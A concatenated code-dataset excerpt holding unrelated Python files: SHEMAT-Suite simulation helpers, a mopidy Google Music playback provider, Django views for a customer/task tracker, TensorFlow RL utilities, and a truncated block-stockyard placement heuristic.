# proc = subprocess.Popen(name, stdin=subprocess.PIPE, stdout=outfile)
# if instr:
# subprocess.Popen.communicate(proc, input=instr)
# if wait:
# subprocess.Popen.wait(proc)
# if errout:
# if (proc.returncode):
# os.chdir(pm.python_dir)
# raise RuntimeError("Problems in " + str(name) + "\n" +
# "Returncode: " + str(proc.returncode))
#############################################################
# CHECK FILE FOR HASHTAG INPUT
#############################################################
def check_hashtag(path, fname, hashtag_line):
"""
Check if file exists and if hashtag_line is in file.
Parameters
----------
path : string
Path to the file. Without '/' at end.
fname : string
Name of the file.
hashtag_line : string
String to search the file for.
Returns
-------
is_hashtag : boolean
False: Hashtag line not in file or file not found.
True: File found and hashtag line found in file.
"""
# Check existence of file.
try:
f = open(path + '/' + fname, 'r')
except IOError:
is_hashtag = False
return is_hashtag
# Check existence of hashtag_line
is_hashtag = False
for line in f:
if line.find(hashtag_line) > -1:
is_hashtag = True
return is_hashtag
#############################################################
# CHANGE HASHTAG INPUT
#############################################################
def change_hashtag_input(file_name, hashtag_line, new_input,
delete_lines=None):
"In file_name hashtag_line is found and new_input inserted as next line"
hashstr_not_exist = 1
file_name_tmp = 'filename.tmp'
file_input = open(file_name, 'r')
file_tmp = open(file_name_tmp, 'w')
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
if (hashstr_exist_check > -1):
hashstr_not_exist = hashstr_not_exist - 1
file_tmp.write(line)
file_tmp.write(new_input)
file_tmp.write("\n\n\n")
if delete_lines:
for i in range(delete_lines):
next(file_input)
else:
file_tmp.write(line)
file_input.close()
file_tmp.close()
os.remove(file_name)
os.rename(file_name_tmp, file_name)
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
' times in ' + file_name)
return
#############################################################
# READ HASHTAG INPUT
#############################################################
def read_hashtag_input(file_name, hashtag_line, nl):
"""
Read a number of lines of a hashtag input
"""
hashstr_not_exist = 1
file_input = open(file_name, 'r')
numl = 1
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
if (hashstr_exist_check > -1):
hashl = numl
hashstr_not_exist = hashstr_not_exist - 1
numl = numl + 1
file_input.close()
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
                           ' times in ' + file_name)
str_out = ""
file_input = open(file_name, 'r')
for i in range(hashl):
file_input.readline()
for i in range(nl):
str_out += file_input.readline()
file_input.close()
return str_out
#############################################################
# READ RECORDS INPUT
#############################################################
def read_records_input(file_name, hashtag_line):
"""
Read number of records of a hashtag input
"""
hashstr_not_exist = 1
file_input = open(file_name, 'r')
numl = 1
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
# print(hashstr_exist_check)
if (hashstr_exist_check > -1):
hashl = numl
hashstr_not_exist = hashstr_not_exist - 1
numl = numl + 1
file_input.close()
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
                           ' times in ' + file_name)
str_out = ""
file_input = open(file_name, 'r')
for i in range(hashl - 1):
file_input.readline()
str_out += file_input.readline()
file_input.close()
records_not_exist_check = 1
for s_out in str.split(str_out):
if s_out[:7] == 'records':
records_not_exist_check = 0
for i in range(len(s_out)):
if s_out[i - 1] == '=':
num_records = int(s_out[i:])
if records_not_exist_check == 1:
raise RuntimeError('No records in Hashtag-Input: ' + hashtag_line)
return num_records
#############################################################
# COMPILEQUICK
#############################################################
def compilequick(model_dir, vtk_var=1, omp_var=1, fw_var=0):
"""
This function is a wrapper organizing different inputs
given to py_compilequick.sh, which is called via
the function rm.run_script.
"""
# Forward or Simulate
if fw_var:
shem_type = "fw"
shem_type_name = "fw"
else:
shem_type = "sm"
shem_type_name = "sm_sgsim"
# Flags
flags = "nohdf -j16"
flags_name = ""
if vtk_var:
flags += " vtk noplt"
flags_name += "vtk"
else:
flags += " novtk plt"
flags_name += "plt"
if omp_var:
flags += " omp"
flags_name += "_omp"
else:
flags += " noomp"
flags_name += ""
compilequick_input = (shem_type + "\n" + shem_type_name + "\n" + flags +
"\n" + flags_name + "\n")
# run_script
compilation_outfile = open('compilation_' + flags_name + '.out', "w")
run_script(model_dir,
'py_compilequick.sh',
outfile=compilation_outfile,
instr=compilequick_input,
wait=True,
errout=True)
compilation_outfile.close()
return
#############################################################
# MATLAB CALL
#############################################################
def matlab_call(mfile_name, matlab_dir):
"This function invokes Matlab to execute mfile_name"
# Should be called in Matlab_Directory!
os.chdir(matlab_dir)
if os.path.isfile(mfile_name):
args = shlex.split('matlab -nodisplay -nojvm < ' + mfile_name)
process_matlab = subprocess.Popen(args)
subprocess.Popen.wait(process_matlab)
if process_matlab.returncode:
raise RuntimeError("Problems in Matlab Execution of " +
mfile_name)
else:
print("\n\n")
else:
print('\n\nThe Matlab .m-file')
print(mfile_name)
print('did not exist in')
print(os.getcwd())
raise RuntimeError("Matlab file not found.")
return
#############################################################
# CHANGE MATLAB
#############################################################
def change_matlab(mfile_name, output_path, filename, use_dists, means,
standard_deviations, sgsim_switch):
"This function changes the Matlab file"
# Should be called in Matlab_Directory!
if os.path.isfile(mfile_name):
mfile_name_tmp = 'mfilename.tmp'
mfile_input = open(mfile_name, 'r')
mfile_tmp = open(mfile_name_tmp, 'w')
for line in mfile_input:
output_path_exist_check = line.find("output_path = '")
filename_exist_check = line.find("filename = '")
use_dists_exist_check = line.find("use_dists = [")
means_exist_check = line.find("means = [")
stddev_exist_check = line.find("standard_deviations = [")
sgsim_switch_exist_check = line.find("sgsim_switch = ")
# print(output_path_exist_check)
if (output_path_exist_check == 0):
# print('Here')
mfile_tmp.write("output_path = '" + output_path + "';\n")
elif (filename_exist_check == 0):
mfile_tmp.write("filename = '" + filename + "';\n")
elif (use_dists_exist_check == 0):
mfile_tmp.write("use_dists = " + use_dists + ";\n")
elif (means_exist_check == 0):
mfile_tmp.write("means = " + means + ";\n")
elif (stddev_exist_check == 0):
mfile_tmp.write("standard_deviations = " +
standard_deviations + ";\n")
elif (sgsim_switch_exist_check == 0):
mfile_tmp.write("sgsim_switch = " + sgsim_switch + ";\n")
else:
mfile_tmp.write(line)
mfile_input.close()
mfile_tmp.close()
os.remove(mfile_name)
os.rename(mfile_name_tmp, mfile_name)
else:
print('\n\nThe Matlab .m-file')
print(mfile_name)
print('did not exist in')
print(os.getcwd())
return
#############################################################
# CHANGE MATLAB
#############################################################
def simulate_dist(model_name,
dist,
is_true=False,
third_row='log permeability,'):
"""
Writing distributions to log-file for SHEMAT-Suite.
Parameters
----------
model_name : string
String of model name.
'wavebc' - Model wavebc
'wavereal' - Model wavereal
'wavewell' - Model wavewell
'wave' - Model wave
dist : array of floats
Samples of distribution that are to be written
to the file.
Notes
-------
The function writes the logk_model.dat or logk_model_true.dat
files in the SHEMAT-Suite model directory using the numpy
savetxt function.
"""
# log_file name
log_file_name = (make_file_dir_names(model_name)[1] + '/' +
make_file_dir_names(model_name)[8]
if not is_true else make_file_dir_names(model_name)[1] +
'/' + make_file_dir_names(model_name)[7])
# Save to text file
np.savetxt(
log_file_name,
dist,
comments='',
header=('Target Histogram\n' + '1\n' + third_row + ' ' +
str(np.mean(dist)) + ' +- ' + str(np.std(dist)) + ', [' +
str(np.min(dist)) + ',' + str(np.max(dist)) + ']'))
###############################################################################
# DOES OUTPUT EXIST #
###############################################################################
def is_output_dir(model_name, dat, let, check_resid=False):
"""
Check if there is an output directory for model_name, dat, let.
If check_resid is given, check for the residual file.
"""
if os.path.isdir(make_output_dirs(model_name, dat, let)[0]):
if check_resid:
if os.path.isfile(
make_output_dirs(model_name, dat, let)[2] + "/" +
"residual_E1.vtk"):
return True
else:
return False
else:
return True
else:
return False
###############################################################################
# MAKE OUTPUT DIRECTORY #
###############################################################################
def make_output_dirs(model_name, dat, let):
"""
Generate output directories of the run corresponding to
- model_name
- dat
- let
0 - output_dir
1 - samples_output_dir
2 - enkf_output_dir
"""
output_dir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output/" + dat + "/" + dat + "_" + let)
samples_output_dir = (os.environ['HOME'] + "/shematOutputDir/" +
model_name + "_output/" + dat + "/" + dat + "_" +
let + "/samples_output")
enkf_output_dir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output/" + dat + "/" + dat + "_" + let +
"/enkf_output")
return output_dir, \
samples_output_dir, \
enkf_output_dir
###############################################################################
# CHANGE OUTPUT DIRECTORY #
###############################################################################
def change_output_dir(model_name, old_dat, new_dat):
"""
Change the name of an output directory.
Parameters
----------
model_name : string
String of model name.
old_dat : string
String with current output date of model run (to be replaced).
new_dat : string
String with future output date of model run.
"""
outdir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output")
# Rename root-date-directory
if os.path.exists(outdir + "/" + old_dat):
os.rename(outdir + "/" + old_dat, outdir + "/" + new_dat)
else:
raise RuntimeError("Directory does not exist: \n" + outdir + "/" +
old_dat)
# Rename dates in subdirectories
subdirs_old = os.listdir(outdir + "/" + new_dat)
subdirs_new = [subdir.replace(old_dat, new_dat) for subdir in subdirs_old]
for i in range(len(subdirs_old)):
os.rename(outdir + "/" + new_dat + "/" + subdirs_old[i],
outdir + "/" + new_dat + "/" + subdirs_new[i])
#############################################################
# MAKE FILE/DIR NAMES
#############################################################
def make_file_dir_names(model_name, nt=0):
"""
Export file and directory names which contain model_name.
Indices of exported files/directories:
0 - model_name_big
1 - model_dir
2 - input_file
3 - enkf_input_file
4 - true_input_file
5 - true_sgsim_file
6 - sgsim_file
7 - true_log_file
8 - log_file
9 - shell_output_file
10 - init_dist_file_one
11 - init_dist_file_two
12 - init_dist_file_three
13 - observations_file
14 - true_file
15 - true_chem_file
16 - monitor_file
17 - time_out_file
18 - assim_out_file_bef
19 - assim_out_file_aft
"""
model_name_big = model_name.upper()
model_dir = os.environ['HOME'] + "/shematModelsDir/" + model_name + "_model"
input_file = model_name_big
enkf_input_file = model_name_big + ".enkf"
true_input_file = model_name_big + "_TRUE"
true_sgsim_file = "sgsim_k_" + model_name + "_true.par"
sgsim_file = "sgsim_k_" + model_name + ".par"
true_log_file = "logk_" + model_name + "_true.dat"
log_file = "logk_" + model_name + ".dat"
shell_output_file = model_name + ".out"
init_dist_file_one = "init_dist_" + model_name + "_1.dat"
init_dist_file_two = "init_dist_" + model_name + "_2.dat"
init_dist_file_three = "init_dist_" + model_name + "_3.dat"
observations_file = "observations_" + model_name_big + ".dat"
true_file = "True" + model_name_big + ".plt"
true_chem_file = "True" + model_name_big + "_chem.plt"
monitor_file = model_name_big + '_E0_monitor_1.dat'
time_out_file = model_name_big + '_E0_time_out_' + str(nt) + '.vtk'
assim_out_file_bef = 'assim_variables_E1_bef_' + str(nt).zfill(4) + '.vtk'
assim_out_file_aft = 'assim_variables_E1_aft_' + str(nt).zfill(4) + '.vtk'
return model_name_big, \
model_dir, \
input_file, \
enkf_input_file, \
true_input_file,\
true_sgsim_file, \
sgsim_file, \
true_log_file, \
log_file, \
shell_output_file, \
init_dist_file_one, \
init_dist_file_two, \
init_dist_file_three, \
observations_file, \
true_file, \
true_chem_file,\
monitor_file,\
time_out_file,\
assim_out_file_bef,\
assim_out_file_aft
#############################################################
# MAKE TMP MODEL DIR
#############################################################
def make_model_dir_tmp(model_name, letter, today):
os.chdir(os.environ['HOME'] + "/shematModelsDir")
# Copy everything to temporal directory
model_dir_name = model_name + '_model_' + today + '_' + letter
new_model_dir = os.environ['HOME'] + "/shematModelsDir/" + model_dir_name
trash_model_dir = os.environ['HOME'] + "/.Trash/" + model_dir_name
trash_model_dir_2 = os.environ['HOME'] + "/.Trash/" + model_dir_name + '_2'
# Check if new_model_dir already exists
if os.path.isdir(new_model_dir):
os.chdir(pm.python_dir)
# _2 dir in .Trash exists: Kill it (should be killable by now)
if os.path.isdir(trash_model_dir_2):
shutil.rmtree(trash_model_dir_2)
# dir in .Trash exists: Rename it to _2 dir in .Trash
if os.path.isdir(trash_model_dir):
os.rename(trash_model_dir, trash_model_dir_2)
# Move old new_model_dir to .Trash
shutil.move(new_model_dir, os.environ['HOME'] + "/.Trash")
shutil.copytree(
os.environ['HOME'] + "/shematModelsDir/" + model_name + '_model',
new_model_dir)
os.chdir(new_model_dir)
# Change the directory inside clean_out, move_output
replace_string('clean_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_clean_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('compilequick.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generateobs.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generatetecmon.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generatetrues.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('move_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_move_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_move_less_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_compilequick.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
os.chmod('clean_output.sh', 128 + 256 + 64)
os.chmod('py_clean_output.sh', 128 + 256 + 64)
os.chmod('compilequick.sh', 128 + 256 + 64)
os.chmod('generateobs.sh', 128 + 256 + 64)
os.chmod('generatetrues.sh', 128 + 256 + 64)
os.chmod('generatetecmon.sh', 128 + 256 + 64)
os.chmod('move_output.sh', 128 + 256 + 64)
os.chmod('py_move_output.sh', 128 + 256 + 64)
os.chmod('py_move_less_output.sh', 128 + 256 + 64)
os.chmod('py_compilequick.sh', 128 + 256 + 64)
os.chmod('veryclean.sh', 128 + 256 + 64)
return new_model_dir
def delete_model_dir_tmp(model_dir):
# Delete the temporal directory
shutil.rmtree(model_dir)
``` |
{
"source": "jjok/mopidy-gmusic",
"score": 2
} |
#### File: mopidy-gmusic/mopidy_gmusic/playback.py
```python
import logging
from mopidy import backend
logger = logging.getLogger(__name__)
BITRATES = {
128: "low",
160: "med",
320: "hi",
}
class GMusicPlaybackProvider(backend.PlaybackProvider):
def translate_uri(self, uri):
track_id = uri.rsplit(":")[-1]
quality = BITRATES[self.backend.config["gmusic"]["bitrate"]]
stream_uri = self.backend.session.get_stream_url(
track_id, quality=quality
)
logger.debug("Translated: %s -> %s", uri, stream_uri)
return stream_uri
``` |
{
"source": "jjolivares/improllow-up",
"score": 2
} |
#### File: customers/cbv_base/DeleteView.py
```python
from django.core.urlresolvers import reverse
from django.views.generic import DeleteView
from django.contrib import messages
class DeleteViewBase(DeleteView):
url_name = ""
template_name = 'base/templates/cbv/base/DeleteViewCustom.html'
class DeleteViewCustom(DeleteViewBase):
def get_success_url(self):
messages.add_message(self.request, messages.INFO, 'Suppression effectuée')
return reverse(self.success_url)
def get_context_data(self, **kwargs):
context = super(DeleteViewCustom, self).get_context_data(**kwargs)
model_name = self.model._meta.verbose_name.title()
context['model_name'] = model_name
context['url_name'] = self.url_name
return context
```
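A sketch of how `DeleteViewCustom` might be wired up; the model, URL names and pattern are placeholders, using the old-style `django.conf.urls.url` to match the Django version implied by `django.core.urlresolvers`:

```python
# Hypothetical subclass and URL wiring (names are placeholders).
from django.conf.urls import url
from customers.models import Customer

class CustomerDeleteView(DeleteViewCustom):
    model = Customer
    success_url = 'customers:list'   # resolved via reverse() on success
    url_name = 'customers:delete'

urlpatterns = [
    url(r'^customers/(?P<pk>\d+)/delete/$',
        CustomerDeleteView.as_view(), name='delete'),
]
```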
#### File: improllow-up/customers/models.py
```python
from django.db import models
class BaseModel(models.Model):
created = models.DateTimeField(
auto_now_add = True,
verbose_name="Date de création"
)
modified = models.DateTimeField(
auto_now = True,
verbose_name="Date de modification"
)
class Meta:
abstract = True
ordering = ("-created", )
class Customer(BaseModel):
corporate_name = models.CharField(
max_length = 255,
verbose_name = "Nom"
)
def __str__(self):
return self.corporate_name
```
#### File: improllow-up/customers/views.py
```python
from django.shortcuts import render
from django.shortcuts import get_object_or_404
from django.db.models import Count
from projects.models import Project
from tasks.models import Task
from .models import Customer
def detail(request, pk):
customer = get_object_or_404(Customer, pk=pk)
project_id_list = Project.objects.filter(
customer=customer
).values_list(
'id',
flat=True
).distinct()
task_list = Task.objects.filter(project__in=project_id_list)
task_list = task_list.values('project').annotate(
total=Count('project')
).order_by('-total')
count_task_list = []
for task in task_list:
count_task_list.append({
'total' : task['total'],
'project':Project.objects.get(id=task['project'])
})
task_list = Task.objects.filter(
project__in = project_id_list,
execution_date__isnull = False
).order_by('-execution_date')[:8]
return render(
request,
'customers/detail.html',
{
'customer' : customer,
'count_task_list' : count_task_list,
'task_list' : task_list,
}
)
```
#### File: improllow-up/users/views.py
```python
import json
import datetime
import csv
from django.shortcuts import render
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q, Count, Sum
from django.core import serializers
from tasks.models import Task
from .models import UserProfile
from .forms import FormConnection, TimeRangeForm
def connection(request):
"""
    This view lets users log in.
"""
form = FormConnection()
if request.POST:
form = FormConnection(request.POST)
if form.is_valid():
username = form.cleaned_data["username"]
            password = form.cleaned_data["password"]
user = authenticate(username=username, password=password)
if user:
login(request, user)
if request.GET.get('next') is not None:
return HttpResponseRedirect(reverse(request.GET['next']))
else:
return HttpResponseRedirect(reverse('users:list'))
return render(request, 'users/connection.html', {'form' : form})
def logout_user(request):
logout(request)
return HttpResponseRedirect(reverse('login'))
def detail(request, pk):
userprofile = get_object_or_404(UserProfile, pk=pk)
task_list = Task.objects.filter(
Q(userprofile=userprofile) |
Q(user_add=userprofile)
)
paginator = Paginator(task_list, 10)
page = request.GET.get('page')
try:
task_list_page = paginator.page(page)
except PageNotAnInteger:
task_list_page = paginator.page(1)
except EmptyPage:
task_list_page = paginator.page(paginator.num_pages)
task_to_do = Task.objects.filter(
userprofile = userprofile,
execution_date__isnull = True
).order_by('-execution_date')[:10]
form = TimeRangeForm()
return render(
request,
'users/detail.html',
{
'userprofile' : userprofile,
'task_list_page' : task_list_page,
'task_to_do' : task_to_do,
'form' : form,
}
)
def repartition_task_base(userprofile, start, end):
data_list = Task.objects.filter(
userprofile=userprofile,
duration__gt=0,
execution_date__isnull=False
)
if start and end:
start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
data_list = data_list.filter(
execution_date__gte = start,
execution_date__lte = end
)
return data_list
def repartition_project(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
data_list = repartition_task_base(userprofile, start, end)
data_list = data_list.values('project__name').annotate(duration_sum=Sum('duration')).order_by()
data_list = list(data_list)
    return JsonResponse(data_list, safe=False)  # json.dumps here would double-encode the payload
def export_csv(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
data_list = Task.objects.filter(
userprofile=userprofile,
duration__gt=0,
execution_date__gte = start,
execution_date__lte = end
).order_by('execution_date')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="'+str(userprofile)+'.csv"'
writer = csv.writer(response, delimiter=';')
field_names = ['Date', 'Projet', 'Tâche', 'Durée', 'Type']
writer.writerow(field_names)
for obj in data_list:
row_list = [
str(obj.execution_date),
str(obj.project),
obj.name,
str(obj.duration),
str(obj.task_type)
]
new_row_list = []
for i in row_list:
if i == 'None':
new_row_list.append('')
else:
new_row_list.append(i)
writer.writerow(new_row_list)
return response
def repartition_temps(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
data_list = repartition_task_base(userprofile, start, end)
data_list = data_list.values('task_type__name').annotate(duration_sum=Sum('duration')).order_by()
data_list = list(data_list)
    return JsonResponse(data_list, safe=False)  # json.dumps here would double-encode the payload
``` |
{
"source": "jjolla93/Block_Stockyard",
"score": 2
} |
#### File: Block_Stockyard/model/helper.py
```python
import numpy as np
import random
import tensorflow as tf
import matplotlib.pyplot as plt
import scipy.misc
import os
import csv
import itertools
import tensorflow.contrib.slim as slim
# This is a simple function to reshape our game frames.
def processState(state1):
return np.reshape(state1, [21168])
# These functions allows us to update the parameters of our target network with those of the primary network.
def updateTargetGraph(tfVars, tau):
total_vars = len(tfVars)
op_holder = []
for idx, var in enumerate(tfVars[0:total_vars // 2]):
op_holder.append(tfVars[idx + total_vars // 2].assign(
(var.value() * tau) + ((1 - tau) * tfVars[idx + total_vars // 2].value())))
return op_holder
def updateTarget(op_holder, sess):
for op in op_holder:
sess.run(op)
total_vars = len(tf.trainable_variables())
a = tf.trainable_variables()[0].eval(session=sess)
b = tf.trainable_variables()[total_vars // 2].eval(session=sess)
if a.all() == b.all():
print("Target Set Success")
else:
print("Target Set Failed")
# Record performance metrics and episode logs for the Control Center.
def saveToCenter(i, rList, jList, bufferArray, summaryLength, h_size, sess, mainQN, time_per_step):
with open('./Center/log.csv', 'a') as myfile:
state_display = (np.zeros([1, h_size]), np.zeros([1, h_size]))
imagesS = []
for idx, z in enumerate(np.vstack(bufferArray[:, 0])):
img, state_display = sess.run([mainQN.salience, mainQN.rnn_state], \
feed_dict={
mainQN.scalarInput: np.reshape(bufferArray[idx, 0], [1, 21168]) / 255.0, \
mainQN.trainLength: 1, mainQN.state_in: state_display,
mainQN.batch_size: 1})
imagesS.append(img)
imagesS = (imagesS - np.min(imagesS)) / (np.max(imagesS) - np.min(imagesS))
imagesS = np.vstack(imagesS)
imagesS = np.resize(imagesS, [len(imagesS), 84, 84, 3])
luminance = np.max(imagesS, 3)
imagesS = np.multiply(np.ones([len(imagesS), 84, 84, 3]), np.reshape(luminance, [len(imagesS), 84, 84, 1]))
make_gif(np.ones([len(imagesS), 84, 84, 3]), './Center/frames/sal' + str(i) + '.gif',
duration=len(imagesS) * time_per_step, true_image=False, salience=True, salIMGS=luminance)
        images = list(zip(bufferArray[:, 0]))  # list(): zip objects have no append in Python 3
        images.append(bufferArray[-1, 3])
images = np.vstack(images)
images = np.resize(images, [len(images), 84, 84, 3])
make_gif(images, './Center/frames/image' + str(i) + '.gif', duration=len(images) * time_per_step,
true_image=True, salience=False)
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow([i, np.mean(jList[-100:]), np.mean(rList[-summaryLength:]), './frames/image' + str(i) + '.gif',
'./frames/log' + str(i) + '.csv', './frames/sal' + str(i) + '.gif'])
myfile.close()
with open('./Center/frames/log' + str(i) + '.csv', 'w') as myfile:
state_train = (np.zeros([1, h_size]), np.zeros([1, h_size]))
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(["ACTION", "REWARD", "A0", "A1", 'A2', 'A3', 'V'])
a, v = sess.run([mainQN.Advantage, mainQN.Value], \
feed_dict={mainQN.scalarInput: np.vstack(bufferArray[:, 0]) / 255.0,
mainQN.trainLength: len(bufferArray), mainQN.state_in: state_train,
mainQN.batch_size: 1})
wr.writerows(zip(bufferArray[:, 1], bufferArray[:, 2], a[:, 0], a[:, 1], a[:, 2], a[:, 3], v[:, 0]))
# This code allows gifs to be saved of the training episode for use in the Control Center.
def make_gif(images, fname, duration=2, true_image=False, salience=False, salIMGS=None):
import moviepy.editor as mpy
def make_frame(t):
try:
x = images[int(len(images) / duration * t)]
except:
x = images[-1]
if true_image:
return x.astype(np.uint8)
else:
return ((x + 1) / 2 * 255).astype(np.uint8)
def make_mask(t):
try:
x = salIMGS[int(len(salIMGS) / duration * t)]
except:
x = salIMGS[-1]
return x
txtClip = mpy.TextClip('.', color='white', font="Amiri-Bold",
kerning=5, fontsize=10)
clip = mpy.VideoClip(make_frame, duration=duration)
clip = mpy.CompositeVideoClip([clip, txtClip])
clip.duration = duration
    if salience:
mask = mpy.VideoClip(make_mask, ismask=True, duration=duration)
clipB = clip.set_mask(mask)
clipB = clip.set_opacity(0)
mask = mask.set_opacity(0.1)
mask.write_gif(fname, fps=len(images) / duration, verbose=False)
# clipB.write_gif(fname, fps = len(images) / duration,verbose=False)
else:
clip.write_gif(fname, fps=len(images) / duration, verbose=False)
def make_gif_with_count(images, counts, fname, duration=2, true_image=False, salience=False, salIMGS=None):
import moviepy.editor as mpy
def make_frame(t):
try:
x = images[int(len(images) / duration * t)]
except:
x = images[-1]
if true_image:
return x.astype(np.uint8)
else:
return ((x + 1) / 2 * 255).astype(np.uint8)
def make_mask(t):
try:
x = salIMGS[int(len(salIMGS) / duration * t)]
except:
x = salIMGS[-1]
return x
clips = []
num_frame = len(images)
for f in range(num_frame):
txtClip = mpy.TextClip(str(counts[f]), color='white', font="Amiri-Bold",
kerning=5, fontsize=10)
_clip = mpy.ImageClip(images[f])
_clip = mpy.CompositeVideoClip([_clip, txtClip])
_clip.duration = duration/num_frame
clips.append(_clip)
clip = mpy.concatenate(clips)
    if salience:
mask = mpy.VideoClip(make_mask, ismask=True, duration=duration)
clipB = clip.set_mask(mask)
clipB = clip.set_opacity(0)
mask = mask.set_opacity(0.1)
mask.write_gif(fname, fps=len(images) / duration, verbose=False)
# clipB.write_gif(fname, fps = len(images) / duration,verbose=False)
else:
clip.write_gif(fname, fps=len(images) / duration, verbose=False)
def color_frame(images, dim=2):
color_map = {
-1: [0, 0, 0],
-2: [100, 0, 0],
0: [255, 0, 0],
1: [0, 255, 0],
2: [255, 255, 0],
3: [0, 150, 150],
4: [0, 0, 255],
5: [0, 0, 255],
6: [0, 0, 255],
7: [0, 0, 255],
8: [0, 0, 255]
}
if dim == 2:
colored_images = np.zeros([len(images), images.shape[1], images.shape[2], 3])
for k in range(len(images)):
for i in range(images.shape[1]):
for j in range(images.shape[2]):
colored_images[k, i, j] = color_map[int(images[k, i, j])]
return colored_images
def color_frame_continuous(images, dim=2):
if dim == 2:
colored_images = np.zeros([len(images), images.shape[1], images.shape[2], 3])
for k in range(len(images)):
for i in range(images.shape[1]):
for j in range(images.shape[2]):
if images[k, i, j] == -1.0:
colored_images[k, i, j] = [0, 0, 0]
else:
colored_images[k, i, j] = [255, min(255, 0.5 * 255 * images[k, i, j]), 0]
return colored_images
```
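The two helpers at the top of this file implement a Polyak soft update: each target-network variable moves toward its main-network counterpart by a factor `tau`. Below is a minimal NumPy sketch of the same arithmetic, added for illustration; the weight lists and `tau` value are hypothetical, not part of the repo.
```python
import numpy as np
def soft_update(main_weights, target_weights, tau=0.001):
    """Polyak averaging: target <- tau * main + (1 - tau) * target."""
    return [tau * m + (1.0 - tau) * t for m, t in zip(main_weights, target_weights)]
main = [np.ones((2, 2)), np.full(3, 3.0)]
target = [np.zeros((2, 2)), np.zeros(3)]
target = soft_update(main, target, tau=0.5)
print(target[0])  # each entry now sits halfway between the two networks
```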
#### File: Block_Stockyard/model/heuristic_abslap.py
```python
from simulater import DataManager
from model.trained_transporter import Transporter
import operator
import numpy as np
import tensorflow as tf
class HeuristicABSLAP(object):
def __init__(self, path, width=5, height=5):
        # Load the input data and store it in member variables
space, blocks = DataManager.import_data_from_csv(path, width, height)
self.num_block = len(blocks)
self.blocks = sorted(blocks, key=operator.attrgetter('_startdate'))
self.height = space.height
self.width = space.width
self.rearrange = 0
sess = tf.Session()
self.transporter = Transporter(sess, width, height, mode=0)
def arrange_blocks(self):
        yard = np.full([self.height, self.width], 0)  # initialize every lot of the yard to 0; values are filled in during the computation
current_date = None
        # Place blocks one at a time: find the candidate lots and pick the one with minimum cost
for block in self.blocks:
schedule = block.get_schedule()
if current_date:
days = (schedule[0] - current_date).days
                # Update the remaining days of the stored blocks when the next block arrives
self.update_state(yard, days)
current_date = schedule[0]
candidates = self.get_candidates(yard)
candidate = self.choose_candidate(yard, candidates)
yard[candidate // yard.shape[1], candidate % yard.shape[1]] = block.term
print(yard)
        # After all blocks are placed, take out the remaining blocks one by one
while np.sum(yard) != 0:
self.update_state(yard, np.min(yard[np.nonzero(yard)]))
        positions = []  # return the assigned lot of each block as a list
return positions
def get_candidates(self, state, exception=[]):
candidates = []
for i, row in enumerate(state):
if sum(row) == 0:
#candidates.append(state.shape[1] * i + state.shape[0] // 2)
candidates.append(state.shape[1] * i)
for j, val in enumerate(row):
if j == 0:
continue
if (i, j) in exception:
continue
if val == 0 and row[j - 1] != 0:
candidates.append(state.shape[1] * i + j)
        # Drop a candidate if it has two or more neighboring candidate lots
num = len(candidates)
for i, candidate in enumerate(candidates[::-1]):
adjacent = 0
if candidate - 1 in candidates:
adjacent += 1
if candidate + 1 in candidates:
adjacent += 1
if candidate - state.shape[1] in candidates:
adjacent += 1
if candidate + state.shape[1] in candidates:
adjacent += 1
if adjacent >= 2:
del candidates[num - i - 1]
return candidates
def update_state(self, state, days):
outbounds = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] == 0:
continue
elif state[i, j] > days:
state[i, j] -= days
else:
                    # Blocks whose remaining days reach 0 or less are added to the outbound list
outbounds.append((i, j))
state[i, j] = 0
for outbound in outbounds:
self.checked = []
self.checked.append(outbound)
            # Check whether the outbound block can actually leave; if not, rearrange
#if not self.check_outbound(state, outbound):
# self.rearrange_block(state, outbound)
        # Perform the rearrangement with the transporting agent
if outbounds:
self.rearrange_by_transporter(state, outbounds)
def choose_candidate(self, state, candidates, block=None):
cost = float('inf')
min_candidate = -1
for candidate in candidates:
if block:
